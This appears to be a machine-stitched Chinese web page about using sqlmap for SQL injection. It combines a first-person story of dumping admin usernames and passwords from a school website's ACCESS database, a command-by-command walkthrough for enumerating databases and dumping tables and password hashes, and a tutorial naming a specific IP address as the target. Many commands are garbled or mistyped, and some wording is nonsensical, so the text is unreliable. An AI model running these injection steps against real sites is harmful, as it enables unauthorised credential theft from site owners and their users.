sqlmap怎么注入ACCESS数据库

记得上次玩是在2 01 8 年,当时我们团队正在做一个学校官网的后台。
当时我在用sqlmap扫表,感觉像作弊一样,很有趣。
我记得使用命令行,它非常容易使用。

当时我们使用命令sqlmap -u "url/NewsShow.asp?id=6 9 " -tables 然后完全按下回车扫描了几个表。
当时我就暗暗发誓一定要找到行政台,因为里面一定有宝物。
结果扫描之后,就出现了管理表。
我激动得手都在颤抖,赶紧按下ctrl+c完成扫描。

因此,我输入命令 sqlmap –u “url/NewsShow.asp?id=6 9 ” –colummns –Tadmin 然后列出用户名、密码和 ID 字段。
那一刻我心里高兴极了,感觉这次有事发生了。
然后我用sqlmap –u “url/NewsShow.asp?id=6 9 ” –dumps –Tadmin –C “用户名、密码”把字段内容跑一遍,然后一路按下回车。

我记得当时,当我扫描第8 个帖子时,用户名突然出现了。
我激动得差点跳起来。
然后密码也出来了。
我赶紧截图记录下来。
现在想起来这种感觉还蛮有趣的。
哈哈,我还记得很清楚。

salmap简单的使用步骤

上周尝试过 sqlmap。

首先清除缓存。
命令:python sqlmap.py --purge 然后检测注入点。
命令: python sqlmap.py -u "http://example.com"
注意到可以注入了。

开始突袭。
命令: python sqlmap.py -u "http://example.com" --dbs
查看一些数据库。

例如当前数据库是: 命令: python sqlmap.py -u "http://example.com" --currentdb 当前用户是: 命令: python sqlmap.py -u "http://example.com" --currentuser
所有用户: 命令:python sqlmap.py -u "http://example.com" --users
密码: 命令: python sqlmap.py -u "http://example.com" --passwords
选择数据库。
例如:db1 .
然后使用命令db1
表: 命令: python sqlmap.py -u "http://example.com" -D db1 --tables 选择一个表,例如table1
学校: 命令: python sqlmap.py -u "http://example.com" -D db1 -T table1 --columns
表示字段内容。
命令: python sqlmap.py -u "http://example.com" -D db1 -T table1 -C columns1 --dump
就这样了。

我不确定这部分。
没关系。

Sqlmap使用安装和命令详细教程

1 、安装Sqlmap之前先安装Python:前往python.org下载合适版本的Python。
安装完成后,将Python目录添加到系统环境变量中。
输入cmd,输入python,界面会显示已安装。

2 使用Sqlmap检测漏洞: 1 . 找到目标无人机:例如这个地址是5 9 .6 3 .2 00.7 9 :8 003 /。
2 、检测注入点:运行命令Sqlmap.pyu "5 9 .6 3 .2 00.7 9 :8 003 /?..."。
3 .检查数据库目录:使用Sqlmap.pyu“uri”dbs。
4 .检查敏感表:使用Sqlmap.pyu“uri”Dmaoshetables。
5 . 要查看管理表详细信息:使用 Sqlmap.pyu "uri" DmaosheTadmindump。

其他常用命令:
爆炸数据库:sqlmap.pyuurldbs
查看当前用户:sqlmap.pyuurlcurrentuser
查找表名称:sqlmap.pyuurltables
查找字段:sqlmap.pyuurldumpC 数据库段D表的字段T
注意:这些命令中的参数请根据您的实际情况进行更改。
您必须有权限才能使用Sqlmap,不要违法。